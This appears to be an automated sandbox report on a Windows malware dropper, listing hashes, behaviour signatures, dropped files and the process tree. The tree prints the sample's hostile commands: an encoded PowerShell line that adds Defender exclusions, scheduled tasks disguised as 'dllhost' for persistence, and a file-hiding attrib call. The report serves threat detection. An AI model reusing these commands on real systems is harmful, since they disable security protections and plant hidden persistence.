Analysis

  • max time kernel
    142s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-10-2023 04:29

General

  • Target

    304cbd6f5879343c68561f1f167415d9d70c24e011c1ec114fca4e885e5a9ae7.exe

  • Size

    2.5MB

  • MD5

    c853a830fa2530a233e4a1eaf84b4273

  • SHA1

    e6dc164da3b49a6c30380773bb2bca70aa937cff

  • SHA256

    304cbd6f5879343c68561f1f167415d9d70c24e011c1ec114fca4e885e5a9ae7

  • SHA512

    d48da0b670fab03f558355d3869bda08deec5d6ff20264814498da0786968c62819457782e986df8bd95258d6216b6837ae7f7d90d7a719303c7abd571896af4

  • SSDEEP

    49152:kA5ujhDMCeR3qwglCPz6ObJJoFj5OkuVoHKHEZD:kA5uj+wCL6VFF1HKHEV

Score
8/10

Malware Config

Signatures

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 12 IoCs
  • Loads dropped DLL 11 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of WriteProcessMemory 49 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\304cbd6f5879343c68561f1f167415d9d70c24e011c1ec114fca4e885e5a9ae7.exe
    "C:\Users\Admin\AppData\Local\Temp\304cbd6f5879343c68561f1f167415d9d70c24e011c1ec114fca4e885e5a9ae7.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:884
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2784
      • C:\Windows\system32\mode.com
        mode 65,10
        3⤵
          PID:856
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e file.zip -p21311161271008922300239931218 -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:3928
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_10.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:3532
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_9.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:4816
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_7.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:4304
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_6.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:3316
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_5.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:3268
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_4.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:4784
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_2.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:4452
        • C:\Users\Admin\AppData\Local\Temp\main\as5eyd6ryftug.exe
          "as5eyd6ryftug.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2876
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /C powershell -EncodedCommand "PAAjAHAAQwBOAHUARwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEANgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB4AFMAcABxAGYAVwBBAHkAQQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBoAEsATwBCAFcAbAAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1392
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -EncodedCommand "PAAjAHAAQwBOAHUARwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEANgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB4AFMAcABxAGYAVwBBAHkAQQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBoAEsATwBCAFcAbAAjAD4A"
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4676
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4304
            • C:\Windows\SysWOW64\schtasks.exe
              SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
              5⤵
              • Creates scheduled task(s)
              PID:2008
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk9364" /TR "C:\ProgramData\Dllhost\dllhost.exe"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:5012
            • C:\Windows\SysWOW64\schtasks.exe
              SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk9364" /TR "C:\ProgramData\Dllhost\dllhost.exe"
              5⤵
              • Creates scheduled task(s)
              PID:4796
        • C:\Windows\system32\attrib.exe
          attrib +H "as5eyd6ryftug.exe"
          3⤵
          • Views/modifies file attributes
          PID:1456
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_1.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:1004
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_3.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:1772
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_8.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:4612

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k5wfegfy.5jz.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\Users\Admin\AppData\Local\Temp\main\as5eyd6ryftug.exe

      Filesize

      21KB

      MD5

      70b8496dd8a0dc8d41f1e74129f8be94

      SHA1

      ffd11fbb9d2663d80f1d1547bf8d6b6eb210e05f

      SHA256

      d6f769246d46eca949590765318a83a06483295dfd0618c4d674f6fb77e6dec9

      SHA512

      246eb2309010b21ba97596dada8aabb425915d888c08c8b849a008c526eea358c9f8960d202628ea804f25762fc7ca355bacbb420d6d1502e0c847e5e6035fab

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

      Filesize

      2.1MB

      MD5

      d5b7028254afd7637094856751ab2b9a

      SHA1

      37e8f2f49ece08d0c2f5070d74073137aad9de31

      SHA256

      64e267c32e468417135d8d606bb71fc662ac62de30eca4772f2e6588c8fba027

      SHA512

      b6bd0afb6ec5fe847e00409cfdbe12e7dab9f342ad380fe657bf621d5fb08d7967d3a147e4a1f451097ea80db14dc44bcdbe90405f8a5ab1ab58dc5bb898a66f

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\as5eyd6ryftug.exe

      Filesize

      21KB

      MD5

      70b8496dd8a0dc8d41f1e74129f8be94

      SHA1

      ffd11fbb9d2663d80f1d1547bf8d6b6eb210e05f

      SHA256

      d6f769246d46eca949590765318a83a06483295dfd0618c4d674f6fb77e6dec9

      SHA512

      246eb2309010b21ba97596dada8aabb425915d888c08c8b849a008c526eea358c9f8960d202628ea804f25762fc7ca355bacbb420d6d1502e0c847e5e6035fab

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

      Filesize

      9KB

      MD5

      f7b4798badf8ad530c2fb3f8dbcf2d71

      SHA1

      122e7fae92a216e42c44d9c4fe1fb56ad1234f2b

      SHA256

      03a735af7aabaeaf189757ac24e28d12d5a4f631dcfbca6f001bae7a4415cde3

      SHA512

      a03f94ae3cb0046de010981aac132a0899b6713853dff0aa714e5cf13e56ce4a6f52122bae830fbb2a57cdc22135d104e35e9252de271780481e89259f62b428

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_10.zip

      Filesize

      1.6MB

      MD5

      9796719d14bcf3c3f63b54c5f4a10293

      SHA1

      6e405be4b0babc3acb32fbf870c27c0737d8ff7a

      SHA256

      9f29f7b3c70535a1e1375b6f177cc02a4edf3528f417cf975fbe36b10e38474c

      SHA512

      52637c7c0c7f5e5447e1827622c36027751b82f31330bcb1d5ced0aa0783eed35ce3b34ca30a841898c7010a619783dfd634225cf65f55569b10c7864bab305b

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip

      Filesize

      9KB

      MD5

      b8026e8bc381ea43cf41f40986f73ed5

      SHA1

      289d750966808b06b8ee304d0ced09f9d75a690f

      SHA256

      24dade000dfce49a245d78cd962bc8db336383e71f55edcd2747229cf3efc568

      SHA512

      8ac675ae90d40c2f980ece264f00e5a3d3024d18d4146fd55d0a9e9c9f7501a06a412ae7ed2e5759200e82b0d75b5f574f22e6e1c483bcd4af512385164433d7

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_3.zip

      Filesize

      9KB

      MD5

      e1f01d1f08f16ee595884d7a764dd09c

      SHA1

      84613071f75d7c898b9cb7c5466f625b06dce11d

      SHA256

      748665ec06c8fe6fa13c79657176323cf701dca64b18bbbfb0c7ff4720255199

      SHA512

      ce89951ae2d56205fc9729e331180d7de714ae7b8fd0b5205c848839f31e731535a0f3a87eb29afbef76d3d8f84d3e652a13c551f40c4044c2b6bab97e6f59fb

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip

      Filesize

      9KB

      MD5

      a007024322669cd81684f4e8300a00a8

      SHA1

      704250c7242be69d2a7129917ec2e3e02dae603f

      SHA256

      06f9f16c96b7f215ce6ee4169cc360f9744872dc43d6a786f3d34f1446905cb3

      SHA512

      c7d26e2f9f7b5b778cda402740c04d3a6049b1712ae15d5e4973691dce089f201a9ff0d292dad4732bb25db1ebeb5544d0d8dbec2074d42a4e517c7b604dd690

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip

      Filesize

      9KB

      MD5

      028237bffdccbe7925a17590e1b8cbb7

      SHA1

      a513a3e9ae0a9e18f0f7fce07c71af6e449ca818

      SHA256

      6769b6d141d7d3abad6f32885ec311b7d6a60a07f767ff327d5ef70879403c2c

      SHA512

      040c16c327e4de878aa821b39bb6894cb2acfc09ebe4ce7be0ddcea53c62d66ac6c5cb8c73f44576d4de8f623c9b7a158ad8cc9b323e84ced9e299ce8f989fc2

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_6.zip

      Filesize

      10KB

      MD5

      501669951a46972b2688306a44fa8d50

      SHA1

      d0a5ae7dca4eb04c8e4585e36e805a22234e75a0

      SHA256

      78b9f024f6dcea35c0262469314c54c007251d7309a17c031f3f3f1576bce0f3

      SHA512

      afa58bb3497caa398888084e1df041d2a884e9b8a9fb5e524638b26f085ab4fc9f1a4d9a55b44eb6af6107608fcf88e8db2b0da534ff30af2b304adb2672af0f

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_7.zip

      Filesize

      10KB

      MD5

      5c23d7b6a2ac491e46ec21ba9853eaab

      SHA1

      d04ecb4bf5ebb0b2c5457bb63879fbd8c585eddc

      SHA256

      d807f1c06861ed8a21debba290ccb4342b6e3c56d8a65326788e54a4b513ea97

      SHA512

      34452dcacc4559687cba7bf474ec9a164c3685600202bbdc478f653a3821b167927861a5c00ffcd2cbd440f0d32868240a54ffff13030b07652b3221746ebcea

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_8.zip

      Filesize

      10KB

      MD5

      d58fc04e6ab09f5e62cc513cffbb923a

      SHA1

      9b6f7636a608b81efd07e299e0844ae9f246fb35

      SHA256

      cc65dd64c10afe4b393a917427711fe7af6dd859ada4781c7c906ef8e2e1fbe6

      SHA512

      64fe8c14a721cc4e6e3de65da9f624345e73fd36023393e3a2c9c736b83ea4e6272880f480b82739a2c45f44618a8b63887d284c30e5cd4f483172ece85a9fa0

    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_9.zip

      Filesize

      10KB

      MD5

      967f51bd49084595bc90a64aaca4143b

      SHA1

      fb70aa37970f27e66c2bb6e0fa47a731e048ab90

      SHA256

      f2495fb3a83e9fd4a9d29618f383f68745e2d180719f8ae206404ddf877f27a5

      SHA512

      d926532bd08a2d9c887b73009983e4333e2bdc50a3946d4cafce0723c4b5f23533d7f0ffecc07b456069e502ad49eacf6a18e4d6888e05400a5b8670e83e346e

    • C:\Users\Admin\AppData\Local\Temp\main\file.bin

      Filesize

      1.6MB

      MD5

      e3bc774b969006eec83bb76a6716e811

      SHA1

      9e5103cf8f12cd151c4490796c4ee8d4efe338c4

      SHA256

      6615fda4c0a3157ed4b14f3b0ea473de5d4007459b4913e14027fe7be6cde2f6

      SHA512

      4e23bf0fec0ef5a65d056e6e5735b9595dfd4de2c7db4bd08cd1842e1eac7f19276e206f9444438b103738c5eb20f2b3d9bc923dbe037dbb246a2cf294156157

    • C:\Users\Admin\AppData\Local\Temp\main\main.bat

      Filesize

      496B

      MD5

      9face8982d69a7cb06e4cc330204412d

      SHA1

      a4181a943a6e402e31077d2713ae55dbd44abdb4

      SHA256

      59ff6a641811c9b680564bfe4477617869f0100fb5d121fffbcd9c33bb326f37

      SHA512

      70b314d21ee8d233a9e62289176cd4da1310a5ba41ca5af7d84c6856edbfee0767bf1db8a66772e2bf985b5f64119689c316c80637cbb2539b18414037295277

    • memory/2876-87-0x0000000005380000-0x0000000005924000-memory.dmp

      Filesize

      5.6MB

    • memory/2876-85-0x0000000000530000-0x000000000053C000-memory.dmp

      Filesize

      48KB

    • memory/2876-86-0x0000000073D50000-0x0000000074500000-memory.dmp

      Filesize

      7.7MB

    • memory/2876-88-0x0000000004E70000-0x0000000004F02000-memory.dmp

      Filesize

      584KB

    • memory/2876-90-0x0000000004E00000-0x0000000004E0A000-memory.dmp

      Filesize

      40KB

    • memory/2876-91-0x0000000073D50000-0x0000000074500000-memory.dmp

      Filesize

      7.7MB

    • memory/2876-92-0x0000000005060000-0x0000000005070000-memory.dmp

      Filesize

      64KB

    • memory/2876-93-0x00000000050E0000-0x0000000005146000-memory.dmp

      Filesize

      408KB

    • memory/2876-149-0x0000000073D50000-0x0000000074500000-memory.dmp

      Filesize

      7.7MB

    • memory/2876-89-0x0000000005060000-0x0000000005070000-memory.dmp

      Filesize

      64KB

    • memory/4676-100-0x0000000005300000-0x0000000005366000-memory.dmp

      Filesize

      408KB

    • memory/4676-125-0x000000006FE40000-0x000000006FE8C000-memory.dmp

      Filesize

      304KB

    • memory/4676-98-0x0000000004AA0000-0x00000000050C8000-memory.dmp

      Filesize

      6.2MB

    • memory/4676-99-0x0000000004A30000-0x0000000004A52000-memory.dmp

      Filesize

      136KB

    • memory/4676-96-0x0000000004420000-0x0000000004430000-memory.dmp

      Filesize

      64KB

    • memory/4676-95-0x0000000073D50000-0x0000000074500000-memory.dmp

      Filesize

      7.7MB

    • memory/4676-110-0x0000000005420000-0x0000000005774000-memory.dmp

      Filesize

      3.3MB

    • memory/4676-111-0x0000000005A90000-0x0000000005AAE000-memory.dmp

      Filesize

      120KB

    • memory/4676-112-0x0000000005AE0000-0x0000000005B2C000-memory.dmp

      Filesize

      304KB

    • memory/4676-116-0x0000000073D50000-0x0000000074500000-memory.dmp

      Filesize

      7.7MB

    • memory/4676-117-0x0000000004420000-0x0000000004430000-memory.dmp

      Filesize

      64KB

